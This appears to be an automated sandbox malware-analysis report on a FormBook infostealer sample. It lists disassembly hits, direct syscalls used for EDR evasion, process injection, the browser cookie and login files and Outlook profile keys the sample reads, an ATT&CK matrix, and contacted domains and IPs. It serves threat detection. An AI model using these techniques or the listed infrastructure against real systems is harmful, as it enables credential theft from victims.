                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772619 mov eax, dword ptr fs:[00000030h]6_2_01772619
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AE609 mov eax, dword ptr fs:[00000030h]6_2_017AE609
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174260B mov eax, dword ptr fs:[00000030h]6_2_0174260B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174260B mov eax, dword ptr fs:[00000030h]6_2_0174260B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174260B mov eax, dword ptr fs:[00000030h]6_2_0174260B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174260B mov eax, dword ptr fs:[00000030h]6_2_0174260B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174260B mov eax, dword ptr fs:[00000030h]6_2_0174260B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174260B mov eax, dword ptr fs:[00000030h]6_2_0174260B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0174260B mov eax, dword ptr fs:[00000030h]6_2_0174260B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AE6F2 mov eax, dword ptr fs:[00000030h]6_2_017AE6F2
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AE6F2 mov eax, dword ptr fs:[00000030h]6_2_017AE6F2
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AE6F2 mov eax, dword ptr fs:[00000030h]6_2_017AE6F2
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AE6F2 mov eax, dword ptr fs:[00000030h]6_2_017AE6F2
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B06F1 mov eax, dword ptr fs:[00000030h]6_2_017B06F1
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B06F1 mov eax, dword ptr fs:[00000030h]6_2_017B06F1
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176A6C7 mov ebx, dword ptr fs:[00000030h]6_2_0176A6C7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176A6C7 mov eax, dword ptr fs:[00000030h]6_2_0176A6C7
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017666B0 mov eax, dword ptr fs:[00000030h]6_2_017666B0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176C6A6 mov eax, dword ptr fs:[00000030h]6_2_0176C6A6
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01734690 mov eax, dword ptr fs:[00000030h]6_2_01734690
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01734690 mov eax, dword ptr fs:[00000030h]6_2_01734690
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D4978 mov eax, dword ptr fs:[00000030h]6_2_017D4978
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D4978 mov eax, dword ptr fs:[00000030h]6_2_017D4978
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BC97C mov eax, dword ptr fs:[00000030h]6_2_017BC97C
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01756962 mov eax, dword ptr fs:[00000030h]6_2_01756962
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01756962 mov eax, dword ptr fs:[00000030h]6_2_01756962
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01756962 mov eax, dword ptr fs:[00000030h]6_2_01756962
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0177096E mov eax, dword ptr fs:[00000030h]6_2_0177096E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0177096E mov edx, dword ptr fs:[00000030h]6_2_0177096E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0177096E mov eax, dword ptr fs:[00000030h]6_2_0177096E
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B0946 mov eax, dword ptr fs:[00000030h]6_2_017B0946
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B892A mov eax, dword ptr fs:[00000030h]6_2_017B892A
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C892B mov eax, dword ptr fs:[00000030h]6_2_017C892B
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BC912 mov eax, dword ptr fs:[00000030h]6_2_017BC912
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01728918 mov eax, dword ptr fs:[00000030h]6_2_01728918
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01728918 mov eax, dword ptr fs:[00000030h]6_2_01728918
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AE908 mov eax, dword ptr fs:[00000030h]6_2_017AE908
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017AE908 mov eax, dword ptr fs:[00000030h]6_2_017AE908
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017629F9 mov eax, dword ptr fs:[00000030h]6_2_017629F9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017629F9 mov eax, dword ptr fs:[00000030h]6_2_017629F9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BE9E0 mov eax, dword ptr fs:[00000030h]6_2_017BE9E0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A9D0 mov eax, dword ptr fs:[00000030h]6_2_0173A9D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A9D0 mov eax, dword ptr fs:[00000030h]6_2_0173A9D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A9D0 mov eax, dword ptr fs:[00000030h]6_2_0173A9D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A9D0 mov eax, dword ptr fs:[00000030h]6_2_0173A9D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A9D0 mov eax, dword ptr fs:[00000030h]6_2_0173A9D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0173A9D0 mov eax, dword ptr fs:[00000030h]6_2_0173A9D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017649D0 mov eax, dword ptr fs:[00000030h]6_2_017649D0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017FA9D3 mov eax, dword ptr fs:[00000030h]6_2_017FA9D3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C69C0 mov eax, dword ptr fs:[00000030h]6_2_017C69C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B89B3 mov esi, dword ptr fs:[00000030h]6_2_017B89B3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B89B3 mov eax, dword ptr fs:[00000030h]6_2_017B89B3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017B89B3 mov eax, dword ptr fs:[00000030h]6_2_017B89B3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017429A0 mov eax, dword ptr fs:[00000030h]6_2_017429A0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017309AD mov eax, dword ptr fs:[00000030h]6_2_017309AD
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017309AD mov eax, dword ptr fs:[00000030h]6_2_017309AD
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BE872 mov eax, dword ptr fs:[00000030h]6_2_017BE872
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BE872 mov eax, dword ptr fs:[00000030h]6_2_017BE872
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C6870 mov eax, dword ptr fs:[00000030h]6_2_017C6870
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017C6870 mov eax, dword ptr fs:[00000030h]6_2_017C6870
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01760854 mov eax, dword ptr fs:[00000030h]6_2_01760854
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01734859 mov eax, dword ptr fs:[00000030h]6_2_01734859
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01734859 mov eax, dword ptr fs:[00000030h]6_2_01734859
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01742840 mov ecx, dword ptr fs:[00000030h]6_2_01742840
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01752835 mov eax, dword ptr fs:[00000030h]6_2_01752835
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01752835 mov eax, dword ptr fs:[00000030h]6_2_01752835
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01752835 mov eax, dword ptr fs:[00000030h]6_2_01752835
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01752835 mov ecx, dword ptr fs:[00000030h]6_2_01752835
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01752835 mov eax, dword ptr fs:[00000030h]6_2_01752835
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01752835 mov eax, dword ptr fs:[00000030h]6_2_01752835
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176A830 mov eax, dword ptr fs:[00000030h]6_2_0176A830
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D483A mov eax, dword ptr fs:[00000030h]6_2_017D483A
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017D483A mov eax, dword ptr fs:[00000030h]6_2_017D483A
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BC810 mov eax, dword ptr fs:[00000030h]6_2_017BC810
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176C8F9 mov eax, dword ptr fs:[00000030h]6_2_0176C8F9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0176C8F9 mov eax, dword ptr fs:[00000030h]6_2_0176C8F9
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017FA8E4 mov eax, dword ptr fs:[00000030h]6_2_017FA8E4
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0175E8C0 mov eax, dword ptr fs:[00000030h]6_2_0175E8C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017BC89D mov eax, dword ptr fs:[00000030h]6_2_017BC89D
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01730887 mov eax, dword ptr fs:[00000030h]6_2_01730887
                Source: C:\Users\user\Desktop\BalphRTkPS.exe, Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                    NtResumeThread: Direct from: 0x773836AC
                    NtMapViewOfSection: Direct from: 0x77382D1C
                    NtWriteVirtualMemory: Direct from: 0x77382E3C
                    NtProtectVirtualMemory: Direct from: 0x77382F9C
                    NtSetInformationThread: Direct from: 0x773763F9
                    NtCreateMutant: Direct from: 0x773835CC
                    NtNotifyChangeKey: Direct from: 0x77383C2C
                    NtSetInformationProcess: Direct from: 0x77382C5C
                    NtCreateUserProcess: Direct from: 0x7738371C
                    NtQueryInformationProcess: Direct from: 0x77382C26
                    NtResumeThread: Direct from: 0x77382FBC
                    NtWriteVirtualMemory: Direct from: 0x7738490C
                    NtAllocateVirtualMemory: Direct from: 0x77383C9C
                    NtReadFile: Direct from: 0x77382ADC
                    NtAllocateVirtualMemory: Direct from: 0x77382BFC
                    NtDelayExecution: Direct from: 0x77382DDC
                    NtQuerySystemInformation: Direct from: 0x77382DFC
                    NtOpenSection: Direct from: 0x77382E0C
                    NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                    NtQuerySystemInformation: Direct from: 0x773848CC
                    NtReadVirtualMemory: Direct from: 0x77382E8C
                    NtCreateKey: Direct from: 0x77382C6C
                    NtClose: Direct from: 0x77382B6C
                    NtAllocateVirtualMemory: Direct from: 0x773848EC
                    NtQueryAttributesFile: Direct from: 0x77382E6C
                    NtSetInformationThread: Direct from: 0x77382B4C
                    NtTerminateThread: Direct from: 0x77382FCC
                    NtQueryInformationToken: Direct from: 0x77382CAC
                    NtOpenKeyEx: Direct from: 0x77382B9C
                    NtAllocateVirtualMemory: Direct from: 0x77382BEC
                    NtDeviceIoControlFile: Direct from: 0x77382AEC
                    NtCreateFile: Direct from: 0x77382FEC
                    NtOpenFile: Direct from: 0x77382DCC
                    NtClose: Direct from: 0x77377B2E
                Source: C:\Users\user\Desktop\BalphRTkPS.exe, Memory written: C:\Users\user\Desktop\BalphRTkPS.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\BalphRTkPS.exe, Section loaded: NULL target: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\BalphRTkPS.exe, Section loaded: NULL target: C:\Windows\SysWOW64\ieUnatt.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\ieUnatt.exe, Section loaded: NULL target: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe protection: read write
                Source: C:\Windows\SysWOW64\ieUnatt.exe, Section loaded: NULL target: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\ieUnatt.exe, Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\ieUnatt.exe, Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\ieUnatt.exe, Thread register set: target process: 1268
                Source: C:\Windows\SysWOW64\ieUnatt.exe, Thread APC queued: target process: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                Source: C:\Users\user\Desktop\BalphRTkPS.exe, Process created: C:\Users\user\Desktop\BalphRTkPS.exe "C:\Users\user\Desktop\BalphRTkPS.exe"
                Source: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe, Process created: C:\Windows\SysWOW64\ieUnatt.exe "C:\Windows\SysWOW64\ieUnatt.exe"
                Source: C:\Windows\SysWOW64\ieUnatt.exe, Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: ikSQhwOmrrnfH.exe, 00000007.00000002.4012924217.0000000001121000.00000002.00000001.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000000.2419701837.0000000001120000.00000002.00000001.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4013305264.0000000001391000.00000002.00000001.00040000.00000000.sdmp
                    Binary or memory string: IProgram Manager
                    Binary or memory string: Shell_TrayWnd
                    Binary or memory string: Progman
                    Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\BalphRTkPS.exe, Queries volume information: C:\Users\user\Desktop\BalphRTkPS.exe VolumeInformation
                Source: C:\Users\user\Desktop\BalphRTkPS.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\BalphRTkPS.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\BalphRTkPS.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\BalphRTkPS.exe, Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\BalphRTkPS.exe, Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\BalphRTkPS.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\BalphRTkPS.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match, File source: 6.2.BalphRTkPS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 6.2.BalphRTkPS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0000000A.00000002.4016477333.0000000005150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.4014023454.0000000004D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.2499317497.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.4013880559.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.2505138823.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4013556321.0000000002840000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\ieUnatt.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\ieUnatt.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\ieUnatt.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\ieUnatt.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\ieUnatt.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\ieUnatt.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\ieUnatt.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\ieUnatt.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\ieUnatt.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match, File source: 6.2.BalphRTkPS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 6.2.BalphRTkPS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0000000A.00000002.4016477333.0000000005150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.4014023454.0000000004D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.2499317497.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.4013880559.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.2505138823.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4013556321.0000000002840000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 51 Virtualization/Sandbox Evasion | Security Account Manager | 51 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 113 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                Behavior Graph ID: 1588694, Sample: BalphRTkPS.exe, Startdate: 11/01/2025, Architecture: WINDOWS, Score: 100

                • Sample-level signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 4 other signatures
                • Sample-level DNS/IP: www.aziziyeescortg.xyz (Performs DNS queries to domains with low reputation); www.zoomlive.live; 10 other IPs or domains
                • BalphRTkPS.exe (started): dropped C:\Users\user\AppData\...\BalphRTkPS.exe.log, ASCII; Injects a PE file into a foreign processes
                • BalphRTkPS.exe (started by BalphRTkPS.exe): Maps a DLL or memory area into another process
                • ikSQhwOmrrnfH.exe (injected by BalphRTkPS.exe): Found direct / indirect Syscall (likely to bypass EDR)
                • ieUnatt.exe (started by ikSQhwOmrrnfH.exe): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                • ikSQhwOmrrnfH.exe (injected by ieUnatt.exe): Found direct / indirect Syscall (likely to bypass EDR); DNS/IP: appsolucao.shop 84.32.84.32, 50005, 50006, 50007 NTT-LT-ASLT Lithuania; www.zoomlive.live 154.208.202.225, 50009, 50010, 50011 DXTL-HKDXTLTseungKwanOServiceHK Seychelles; 9 other IPs or domains
                • firefox.exe (started by ieUnatt.exe)

                Source | Detection | Scanner | Label | Link
                BalphRTkPS.exe | 71% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook |
                BalphRTkPS.exe | 68% | Virustotal | | Browse
                BalphRTkPS.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                Name | Malicious | Antivirus Detection | Reputation
                Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://digi-searches.com/Camas.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%2FtC4kDJLBieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    high
